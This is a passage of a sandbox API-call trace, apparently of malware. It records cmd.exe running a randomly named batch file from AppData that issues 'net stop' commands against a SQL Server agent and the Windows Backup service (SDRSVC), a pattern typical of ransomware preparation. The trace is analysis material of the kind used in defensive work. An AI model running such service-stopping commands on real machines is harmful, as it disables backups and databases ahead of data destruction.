out: hHeap=0x3e0000) returned 1 [0205.359] GetProcessHeap () returned 0x3e0000 [0205.359] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0205.359] GetProcessHeap () returned 0x3e0000 [0205.359] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0205.359] GetProcessHeap () returned 0x3e0000 [0205.359] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0205.359] GetProcessHeap () returned 0x3e0000 [0205.359] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0205.359] GetProcessHeap () returned 0x3e0000 [0205.359] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0205.359] GetProcessHeap () returned 0x3e0000 [0205.359] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0205.359] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.359] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf4e [0205.359] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x973, lpOverlapped=0x0) returned 1 [0205.360] SetFilePointer (in: hFile=0x78, lDistanceToMove=3949, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf6d [0205.360] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=31, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$SQL_2008 /y\r\n\r\n/y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 31 [0205.360] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.360] GetFileType (hFile=0x78) returned 0x1 [0205.360] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.360] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf6d [0205.360] GetProcessHeap () returned 0x3e0000 [0205.360] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0205.360] GetProcessHeap () returned 0x3e0000 [0205.360] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0205.364] _tell (_FileHandle=3) returned 3949 [0205.364] _close (_FileHandle=3) returned 0 [0205.364] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0205.364] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0205.364] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0205.364] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0205.364] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0205.364] _wcsicmp (_String1="net", _String2="CD") returned 11 [0205.364] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0205.364] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0205.364] _wcsicmp (_String1="net", _String2="REN") returned -4 [0205.364] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0205.364] _wcsicmp (_String1="net", _String2="SET") returned -5 [0205.364] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0205.365] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0205.365] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0205.365] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0205.365] _wcsicmp (_String1="net", _String2="MD") returned 1 [0205.365] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0205.365] _wcsicmp (_String1="net", _String2="RD") returned -4 [0205.365] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0205.365] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0205.365] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0205.365] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0205.365] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0205.365] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0205.365] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0205.365] _wcsicmp (_String1="net", _String2="VER") returned -8 [0205.365] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0205.365] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0205.365] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0205.365] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0205.365] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0205.365] _wcsicmp (_String1="net", _String2="START") returned -5 [0205.365] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0205.365] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0205.365] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0205.365] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0205.365] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0205.365] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0205.365] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0205.365] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0205.365] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0205.365] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0205.366] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0205.366] SetErrorMode (uMode=0x0) returned 0x1 [0205.366] GetProcessHeap () returned 0x3e0000 [0205.366] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0205.366] GetProcessHeap () returned 0x3e0000 [0205.366] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0205.366] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.366] GetProcessHeap () returned 0x3e0000 [0205.366] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0205.366] GetProcessHeap () returned 0x3e0000 [0205.366] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0205.367] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0205.367] GetProcessHeap () returned 0x3e0000 [0205.367] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0205.367] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.367] GetProcessHeap () returned 0x3e0000 [0205.367] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0205.367] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0205.367] GetProcessHeap () returned 0x3e0000 [0205.367] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0205.367] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.368] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.368] GetLastError () returned 0x2 [0205.368] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.368] GetLastError () returned 0x2 [0205.369] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.369] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.369] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.370] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.370] GetLastError () returned 0x2 [0205.370] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.370] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.371] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.371] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0205.371] SetErrorMode (uMode=0x0) returned 0x1 [0205.371] GetProcessHeap () returned 0x3e0000 [0205.371] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0205.371] GetProcessHeap () returned 0x3e0000 [0205.371] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0205.372] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.372] GetProcessHeap () returned 0x3e0000 [0205.372] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0205.372] GetProcessHeap () returned 0x3e0000 [0205.372] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0205.372] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0205.372] GetProcessHeap () returned 0x3e0000 [0205.372] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0205.372] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.372] GetProcessHeap () returned 0x3e0000 [0205.372] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0205.373] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0205.373] GetProcessHeap () returned 0x3e0000 [0205.373] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0205.373] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.373] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.373] GetLastError () returned 0x2 [0205.374] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.374] GetLastError () returned 0x2 [0205.374] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.375] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0205.375] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0205.375] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.375] GetLastError () returned 0x2 [0205.376] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0205.376] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0205.376] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.376] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0205.376] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0205.377] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0205.377] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0205.377] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$SQL_2008 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$SQL_2008 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x62c, dwThreadId=0xb3c)) returned 1 [0205.381] CloseHandle (hObject=0x78) returned 1 [0205.381] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0205.381] GetProcessHeap () returned 0x3e0000 [0205.381] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.381] GetEnvironmentStringsW () returned 0x3f8408* [0205.381] GetProcessHeap () returned 0x3e0000 [0205.381] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.381] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.381] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0205.549] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0205.549] CloseHandle (hObject=0x74) returned 1 [0205.549] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0205.549] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0205.549] GetProcessHeap () returned 0x3e0000 [0205.549] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.549] GetEnvironmentStringsW () returned 0x3f8408* [0205.549] GetProcessHeap () returned 0x3e0000 [0205.549] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.550] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.550] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0205.550] GetProcessHeap () returned 0x3e0000 [0205.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.550] GetEnvironmentStringsW () returned 0x3f8408* [0205.550] GetProcessHeap () returned 0x3e0000 [0205.550] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.550] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.550] GetProcessHeap () returned 0x3e0000 [0205.550] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0205.550] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0205.550] _get_osfhandle (_FileHandle=1) returned 0x264 [0205.550] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0205.550] _get_osfhandle (_FileHandle=1) returned 0x264 [0205.550] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0205.551] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0205.551] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0205.551] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0205.551] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0205.551] SetConsoleInputExeNameW () returned 0x1 [0205.551] GetConsoleOutputCP () returned 0x1b5 [0205.551] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0205.551] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0205.552] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0205.552] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.552] SetFilePointer (in: hFile=0x74, lDistanceToMove=3949, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf6d [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0205.552] GetProcessHeap () returned 0x3e0000 [0205.553] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0205.553] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.553] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf6d [0205.553] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x954, lpOverlapped=0x0) returned 1 [0205.553] SetFilePointer (in: hFile=0x74, lDistanceToMove=3969, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf81 [0205.553] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=20, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SDRSVC /y\r\nL_2008 /y\r\n\r\n/y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 20 [0205.553] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.553] GetFileType (hFile=0x74) returned 0x1 [0205.553] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.553] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf81 [0205.553] GetProcessHeap () returned 0x3e0000 [0205.553] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0205.553] GetProcessHeap () returned 0x3e0000 [0205.553] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0205.557] _tell (_FileHandle=3) returned 3969 [0205.557] _close (_FileHandle=3) returned 0 [0205.557] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0205.557] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0205.557] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0205.557] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0205.557] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0205.557] _wcsicmp (_String1="net", _String2="CD") returned 11 [0205.557] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0205.557] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0205.557] _wcsicmp (_String1="net", _String2="REN") returned -4 [0205.557] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0205.557] _wcsicmp (_String1="net", _String2="SET") returned -5 [0205.557] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0205.557] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0205.557] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0205.557] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0205.557] _wcsicmp (_String1="net", _String2="MD") returned 1 [0205.557] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0205.557] _wcsicmp (_String1="net", _String2="RD") returned -4 [0205.557] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0205.557] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0205.557] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0205.557] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0205.557] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0205.557] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0205.557] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0205.557] _wcsicmp (_String1="net", _String2="VER") returned -8 [0205.557] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0205.557] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0205.557] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0205.557] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0205.557] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0205.557] _wcsicmp (_String1="net", _String2="START") returned -5 [0205.557] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0205.558] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0205.558] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0205.558] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0205.558] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0205.558] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0205.558] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0205.558] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0205.558] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0205.558] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0205.558] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0205.558] SetErrorMode (uMode=0x0) returned 0x1 [0205.558] GetProcessHeap () returned 0x3e0000 [0205.558] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0205.558] GetProcessHeap () returned 0x3e0000 [0205.558] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0205.559] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.559] GetProcessHeap () returned 0x3e0000 [0205.559] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0205.559] GetProcessHeap () returned 0x3e0000 [0205.559] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0205.559] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0205.559] GetProcessHeap () returned 0x3e0000 [0205.559] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0205.559] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.559] GetProcessHeap () returned 0x3e0000 [0205.559] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0205.560] RtlReAllocateHeap (Heap=0x3e0000, 